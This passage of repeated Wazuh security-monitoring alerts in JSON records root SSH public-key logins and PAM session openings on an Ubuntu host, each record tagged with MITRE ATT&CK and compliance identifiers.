success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 